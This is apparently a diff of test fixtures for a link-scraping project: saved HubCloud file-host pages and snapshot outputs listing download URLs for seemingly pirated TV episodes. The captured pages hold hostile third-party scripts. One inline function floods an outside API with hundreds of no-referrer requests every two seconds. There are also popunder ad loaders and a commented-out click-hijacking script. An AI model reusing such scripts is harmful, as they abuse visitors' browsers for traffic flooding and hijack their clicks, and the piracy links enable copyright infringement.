<a href="https://ddl2.cloudserver-1692964037.workers.dev/1397313204/31f8b5a9e6a1a2e056ef0905797230a1f28057dc1e4d12e6843c03ac6bfdf7d87889a636620b547798bce78d1647ebb482a308c38e4149f422bc3afb2b6f7d171a63e1ff2029b7f90c72181d26989a4de3c23f7b316ee3138fc1dd9c2612d8c8dae2b4c5297f87320ffcb63d71429bde3258ec121653bd4c6f49f372465f13acf7bcc770f52f649c1c65c7cc54d18ed36620a55ccb9bbef084af996524ea69df8191345e6dba2f8398d7b5c3ef2500a32bd2e147507a1741efe63c902d8e1821::61c7925f0014900c78f913a268a069bf/Dark.S03E08.The.Paradise.1080p.NF.WEB-DL.English.DDP5.1-German.DDP5.1.H.264-4kHdHub.Com.mkv.zip" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #474b48 !important;"><i class="fas fa-file-download fa-lg"></i> Download [ZipDisk Server]</a>
|
||||
<p style="
|
||||
font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">Resume is Supported in ZipDisk But please extract it as the files is inside zip</p>
|
||||
|
||||
|
||||
|
||||
|
|
@ -224,7 +240,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
<br>
|
||||
<a href="https://www-google-com.cdn.ampproject.org/c/s/bloggingvector.shop/foo/aHR0cHM6Ly93d3ctZ29vZ2xlLWNvbS5jZG4uYW1wcHJvamVjdC5vcmcvYy9zL25ld3NvbmdzLmNvLmluL2dvP2lkPTNPZnAzZHl1b3FUaHp1RFkzTi9LNGFIWjNOQ2p1K3JQek9EaTZ0SGgyTlhrNGFqbjU5YmYzYkhEeTltdXlNZTd3OHJmcEtqSG1zYkN3cDIvcXNxOTFiL0t1S3FpeXFianhNZlV2cmpKMjlXNjJPQ2htc2pMNWJ6T3ljbTZ3Y0hZdWN1eTRMRT0=" target="_blank" rel="noopener noreferrer nofollow" class="btn btn-primary h5" style="margin-top: 11px;"><i class="fab fa-telegram fa-lg"></i></i> Downoad From Telegram 🔥</a>
|
||||
<a href="https://www-google-com.cdn.ampproject.org/c/s/bloggingvector.shop/foo/aHR0cHM6Ly93d3ctZ29vZ2xlLWNvbS5jZG4uYW1wcHJvamVjdC5vcmcvYy9zL25ld3NvbmdzLmNvLmluL2dvP2lkPTNPZnAzZHl1b3FUaHp1RFkzTi9LNGFIWjNOQ2p1K3JQek9EaTZ0SGgyTlhrNGFqbjU5YmYzYkhEeThPdXlOMjMxNys1cCszRHdPVEN3cDIvcXNxOTFiL0t1S3FpeXFianhNZlV2cmpKMjlXNjJPQ2htc2pMNWJ6T3ljbTZ3Y0hZdWN1eTRMRT0=" target="_blank" rel="noopener noreferrer nofollow" class="btn btn-primary h5" style="margin-top: 11px;"><i class="fab fa-telegram fa-lg"></i></i> Downoad From Telegram 🔥</a>
|
||||
|
||||
<button id="android_launch" class="btn btn-success btn-lg h6 p-2 d-none" style="background: #0d0b15 !important;"><i class="fab fa-android fa-lg" style="color: #63E6BE;"></i> DL/Open with Android App</button>
|
||||
|
||||
|
|
@ -278,7 +294,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.one/drive/nknlofk8snfnknh</p>
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.foo/drive/nknlofk8snfnknh</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -312,6 +328,7 @@ Msc
|
|||
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
|
||||
|
||||
<!--2dl-->
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
@ -326,25 +343,44 @@ function cn(t){let e=window.location.protocol+"//"+window.location.host+t;histor
|
|||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
<script>
|
||||
function x(){
|
||||
for (let i = 0; i < 369; i++) {
|
||||
|
||||
fetch("https://apis.damanworlds.world/api/"+new Date().getTime() + i, {
|
||||
"method": "GET",
|
||||
"mode": "no-cors",
|
||||
"referrerPolicy": 'no-referrer',
|
||||
});
|
||||
}
|
||||
}
|
||||
x();
|
||||
const intervalId = setInterval(() => {
|
||||
x();
|
||||
}, 2000)
|
||||
</script>
|
||||
|
||||
<!--<script async src="https://greenanalytics.autos/recaptcha/v4_enc.js"></script>-->
|
||||
|
||||
<!--<script>let s__=!1,observer=null;const sc_="a, button";function opst(e){if(!s__)return;e.preventDefault(),e.stopImmediatePropagation();let t=document.createElement("a");t.href=s__,t.target="_blank",t.rel="noopener noreferrer",t.click();let r=document.querySelectorAll(sc_);r.forEach(e=>{e.removeEventListener("click",opst)}),observer.disconnect()}function atchs(){let e=document.querySelectorAll(sc_);e.forEach(e=>{e.addEventListener("click",opst,{once:!0})})}window.addEventListener("message",function(e){try{let t=JSON.parse(e.data);t?.url&&(s__=t.url,atchs(),(observer=new MutationObserver(atchs)).observe(document.body,{childList:!0,subtree:!0}))}catch(r){}},!1);-->
|
||||
<!--</script>-->
|
||||
|
||||
|
||||
<script>
|
||||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<script data-cfasync="false" type="text/javascript" id="clever-core">
|
||||
/* <![CDATA[ */
|
||||
(function (document, window) {
|
||||
var a, c = document.createElement("script"), f = window.frameElement;
|
||||
|
||||
c.id = "CleverCoreLoader98023";
|
||||
c.src = "https://scripts.cleverwebserver.com/9afdf189fcae8189c250865783d52630.js";
|
||||
|
||||
c.async = !0;
|
||||
c.type = "text/javascript";
|
||||
c.setAttribute("data-target", window.name || (f && f.getAttribute("id")));
|
||||
c.setAttribute("data-callback", "put-your-callback-function-here");
|
||||
c.setAttribute("data-callback-url-click", "put-your-click-macro-here");
|
||||
c.setAttribute("data-callback-url-view", "put-your-view-macro-here");
|
||||
|
||||
try {
|
||||
a = parent.document.getElementsByTagName("script")[0] || document.getElementsByTagName("script")[0];
|
||||
} catch (e) {
|
||||
a = !1;
|
||||
}
|
||||
|
||||
a || (a = document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]);
|
||||
a.parentNode.insertBefore(c, a);
|
||||
})(document, window);
|
||||
/* ]]> */
|
||||
</script>
|
||||
|
|
@ -18,7 +18,15 @@
|
|||
<meta name="googlebot" content="noindex,nofollow">
|
||||
|
||||
|
||||
<script data-cfasync="false" src="//d2hdyssxn6lpj2.cloudfront.net/?sydhd=1173967"></script>
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220840"></script>-->
|
||||
|
||||
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10550070',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!-- Cloudflare Web Analytics --><script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon='{"token": "4a22bad849ab4d2da600be878e3c0fc2"}'></script><!-- End Cloudflare Web Analytics -->
|
||||
|
||||
|
|
@ -147,7 +155,7 @@
|
|||
|
||||
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
<br>
|
||||
<div class="container container-fluid main">
|
||||
|
|
@ -217,7 +225,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
|
||||
|
||||
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=bffzqlpqfllfcld&token=ZDdhbnhoS3dXSzlGOGhnN3ErdTUxVGpNRHpBR2lCakE1ZHJUTlcvUTlaTT0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=bffzqlpqfllfcld&token=ZDdhbnhoS3dXSzlGOGhnN3ErdTUxVEl6a2RJOUt6ZTkwSXZMa1JXOFd2WT0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
|
||||
|
||||
<center>
|
||||
|
|
@ -269,7 +277,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p onclick="copy_link('div1')">https://hubcloud.one/drive/bffzqlpqfllfcld</p>
|
||||
<p onclick="copy_link('div1')">https://hubcloud.foo/drive/bffzqlpqfllfcld</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -280,7 +288,7 @@ setTimeout(function(){
|
|||
document.querySelector(".loading").classList.add("d-none");
|
||||
document.querySelector(".vd").classList.remove("d-none");
|
||||
}, 2000);
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=bffzqlpqfllfcld&token=ZDdhbnhoS3dXSzlGOGhnN3ErdTUxVGpNRHpBR2lCakE1ZHJUTlcvUTlaTT0=';
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=bffzqlpqfllfcld&token=ZDdhbnhoS3dXSzlGOGhnN3ErdTUxVEl6a2RJOUt6ZTkwSXZMa1JXOFd2WT0=';
|
||||
|
||||
var download = document.getElementById('download');
|
||||
download.onclick = function() {
|
||||
|
|
@ -312,6 +320,7 @@ function copy_link(e){let el=e;e = document.getElementById(el).value; if(typeof
|
|||
<br><br>
|
||||
</div>
|
||||
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
|
|||
|
|
@ -18,7 +18,15 @@
|
|||
<meta name="googlebot" content="noindex,nofollow">
|
||||
|
||||
|
||||
<script data-cfasync="false" src="//d2hdyssxn6lpj2.cloudfront.net/?sydhd=1173967"></script>
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220840"></script>-->
|
||||
|
||||
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10550070',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!-- Cloudflare Web Analytics --><script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon='{"token": "4a22bad849ab4d2da600be878e3c0fc2"}'></script><!-- End Cloudflare Web Analytics -->
|
||||
|
||||
|
|
@ -147,7 +155,7 @@
|
|||
|
||||
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
<br>
|
||||
<div class="container container-fluid main">
|
||||
|
|
@ -217,7 +225,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
|
||||
|
||||
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=idt1evqfuviqiei&token=RUhXL2kvWnI3MmtFTTlyc1VGY2JSUHJiRlcvSTBwOG9HNWFOa2tiMWVxMD0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=idt1evqfuviqiei&token=RUhXL2kvWnI3MmtFTTlyc1VGY2JSUDFDT2lKbHJxeHZBNk5reExFai9BMD0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
|
||||
|
||||
<center>
|
||||
|
|
@ -269,7 +277,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p onclick="copy_link('div1')">https://hubcloud.one/drive/idt1evqfuviqiei</p>
|
||||
<p onclick="copy_link('div1')">https://hubcloud.foo/drive/idt1evqfuviqiei</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -280,7 +288,7 @@ setTimeout(function(){
|
|||
document.querySelector(".loading").classList.add("d-none");
|
||||
document.querySelector(".vd").classList.remove("d-none");
|
||||
}, 2000);
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=idt1evqfuviqiei&token=RUhXL2kvWnI3MmtFTTlyc1VGY2JSUHJiRlcvSTBwOG9HNWFOa2tiMWVxMD0=';
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=idt1evqfuviqiei&token=RUhXL2kvWnI3MmtFTTlyc1VGY2JSUDFDT2lKbHJxeHZBNk5reExFai9BMD0=';
|
||||
|
||||
var download = document.getElementById('download');
|
||||
download.onclick = function() {
|
||||
|
|
@ -312,6 +320,7 @@ function copy_link(e){let el=e;e = document.getElementById(el).value; if(typeof
|
|||
<br><br>
|
||||
</div>
|
||||
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
|
|||
|
|
@ -18,7 +18,15 @@
|
|||
<meta name="googlebot" content="noindex,nofollow">
|
||||
|
||||
|
||||
<script data-cfasync="false" src="//d2hdyssxn6lpj2.cloudfront.net/?sydhd=1173967"></script>
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220840"></script>-->
|
||||
|
||||
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10550070',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!-- Cloudflare Web Analytics --><script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon='{"token": "4a22bad849ab4d2da600be878e3c0fc2"}'></script><!-- End Cloudflare Web Analytics -->
|
||||
|
||||
|
|
@ -147,7 +155,7 @@
|
|||
|
||||
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
<br>
|
||||
<div class="container container-fluid main">
|
||||
|
|
@ -217,7 +225,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
|
||||
|
||||
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=nknlofk8snfnknh&token=eWJLS25YL0hUektLS0k0a3htWVJzOEFuVnVvTHVEKzJ4eCtPUFBuUkRQRT0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
<a id="download" href="https://gamerxyt.com/hubcloud.php?host=hubcloud&id=nknlofk8snfnknh&token=eWJLS25YL0hUektLS0k0a3htWVJzOVAxdWdnL01tM2FOcGtHNjlNa1Z4ST0=" rel="noopener noreferrer nofollow" class="btn btn-primary h6 p-2"><i class="fas fa-file-download fa-lg"></i> Generate Direct Download Link</a>
|
||||
|
||||
|
||||
<center>
|
||||
|
|
@ -228,7 +236,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
|
||||
|
||||
|
||||
<a href="https://www-google-com.cdn.ampproject.org/c/s/bloggingvector.shop/foo/aHR0cHM6Ly93d3ctZ29vZ2xlLWNvbS5jZG4uYW1wcHJvamVjdC5vcmcvYy9zL25ld3NvbmdzLmNvLmluL2dvP2lkPTNPZnAzZHl1b3FUaHp1RFkzTi9LNGFIWjNOQ2p1K3JQek9EaTZ0SGgyTlhrNGFqbjU5YmYzYkhEeTltdXlNZTd3OHJmcEtqSG1zYkN3cDIvcXNxOTFiL0t1S3FpeXFianhNZlV2cmpKMjlXNjJPQ2htc2pMNWJ6T3ljbTZ3Y0hZdWN1eTRMRT0=" target="_blank" rel="noopener noreferrer nofollow" class="btn btn-primary h5 p-2" id="tgbtn" style="margin-top: 11px;"><i class="fab fa-telegram fa-lg"></i></i> Download From Telegram</a>
|
||||
<a href="https://www-google-com.cdn.ampproject.org/c/s/bloggingvector.shop/foo/aHR0cHM6Ly93d3ctZ29vZ2xlLWNvbS5jZG4uYW1wcHJvamVjdC5vcmcvYy9zL25ld3NvbmdzLmNvLmluL2dvP2lkPTNPZnAzZHl1b3FUaHp1RFkzTi9LNGFIWjNOQ2p1K3JQek9EaTZ0SGgyTlhrNGFqbjU5YmYzYkhEeThPdXlOMjMxNys1cCszRHdPVEN3cDIvcXNxOTFiL0t1S3FpeXFianhNZlV2cmpKMjlXNjJPQ2htc2pMNWJ6T3ljbTZ3Y0hZdWN1eTRMRT0=" target="_blank" rel="noopener noreferrer nofollow" class="btn btn-primary h5 p-2" id="tgbtn" style="margin-top: 11px;"><i class="fab fa-telegram fa-lg"></i></i> Download From Telegram</a>
|
||||
|
||||
|
||||
</div>
|
||||
|
|
@ -270,7 +278,7 @@ HubCloud | <a href="https://hubcloud.fans/">Create An Account</a> |<a href="http
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p onclick="copy_link('div1')">https://hubcloud.one/drive/nknlofk8snfnknh</p>
|
||||
<p onclick="copy_link('div1')">https://hubcloud.foo/drive/nknlofk8snfnknh</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -281,7 +289,7 @@ setTimeout(function(){
|
|||
document.querySelector(".loading").classList.add("d-none");
|
||||
document.querySelector(".vd").classList.remove("d-none");
|
||||
}, 2000);
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=nknlofk8snfnknh&token=eWJLS25YL0hUektLS0k0a3htWVJzOEFuVnVvTHVEKzJ4eCtPUFBuUkRQRT0=';
|
||||
var url = 'https://gamerxyt.com/hubcloud.php?host=hubcloud&id=nknlofk8snfnknh&token=eWJLS25YL0hUektLS0k0a3htWVJzOVAxdWdnL01tM2FOcGtHNjlNa1Z4ST0=';
|
||||
|
||||
var download = document.getElementById('download');
|
||||
download.onclick = function() {
|
||||
|
|
@ -313,6 +321,7 @@ function copy_link(e){let el=e;e = document.getElementById(el).value; if(typeof
|
|||
<br><br>
|
||||
</div>
|
||||
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
|
|||
|
|
@ -13,26 +13,13 @@ exports[`HubCloud handle crayon shin-chan 1993 1`] = `
|
|||
},
|
||||
"sourceId": "hubcloud_fsl",
|
||||
"ttl": 259200000,
|
||||
"url": "https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Crayon%20Shinchan%20Action%20Kamen%20vs%20Demon%201993%201080p%20BluRay%20REMUX%20AVC%20[Hindi%20DD%202.0%20+%20Japanese%20FLAC%202.0]%20PitiPati-Ionicboy%204kHDHub.com.mkv?token=1758025506",
|
||||
"url": "https://pub-6b25c191839c4b01a878de4fdde0227b.r2.dev/e35ec4a9a4efb5a154d0d10f9481dafc?token=1765557445",
|
||||
},
|
||||
]
|
||||
`;
|
||||
|
||||
exports[`HubCloud handle dark 2017 s03e08 1`] = `
|
||||
[
|
||||
{
|
||||
"format": "unknown",
|
||||
"label": "HubCloud (FSL)",
|
||||
"meta": {
|
||||
"bytes": 3382286745,
|
||||
"countryCodes": [],
|
||||
"extractorId": "hubcloud",
|
||||
"title": "Dark.S03E08.The.Paradise.1080p.NF.WEB-DL.English.DDP5.1-German.DDP5.1.H.264-4kHdHub.Com.mkv",
|
||||
},
|
||||
"sourceId": "hubcloud_fsl",
|
||||
"ttl": 259200000,
|
||||
"url": "https://pub-c0c400d353df4c68ae3a2d5e089ecf60.r2.dev/Dark.S03E08.The.Paradise.1080p.NF.WEB-DL.English.DDP5.1-German.DDP5.1.H.264-4kHdHub.Com.mkv",
|
||||
},
|
||||
{
|
||||
"format": "unknown",
|
||||
"label": "HubCloud (PixelServer)",
|
||||
|
|
@ -44,7 +31,7 @@ exports[`HubCloud handle dark 2017 s03e08 1`] = `
|
|||
},
|
||||
"sourceId": "hubcloud_pixelserver",
|
||||
"ttl": 259200000,
|
||||
"url": "https://pixeldrain.dev/api/file/2kFQBQio?download",
|
||||
"url": "https://pixeldrain.dev/api/file/2kFQBQio",
|
||||
},
|
||||
]
|
||||
`;
|
||||
|
|
@ -62,7 +49,7 @@ exports[`HubCloud handle dexter original sin 2024 s01e01 1`] = `
|
|||
},
|
||||
"sourceId": "hubcloud_fsl",
|
||||
"ttl": 259200000,
|
||||
"url": "https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1758025505",
|
||||
"url": "https://pub-b5ecaffddf2344a0ae2222f5e8913e1b.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1765557444",
|
||||
},
|
||||
{
|
||||
"format": "unknown",
|
||||
|
|
@ -75,7 +62,7 @@ exports[`HubCloud handle dexter original sin 2024 s01e01 1`] = `
|
|||
},
|
||||
"sourceId": "hubcloud_pixelserver",
|
||||
"ttl": 259200000,
|
||||
"url": "https://pixeldrain.net/api/file/HqAiguQV",
|
||||
"url": "https://pixeldrain.dev/api/file/HqAiguQV",
|
||||
},
|
||||
]
|
||||
`;
|
||||
|
|
|
|||
Loading…
Reference in a new issue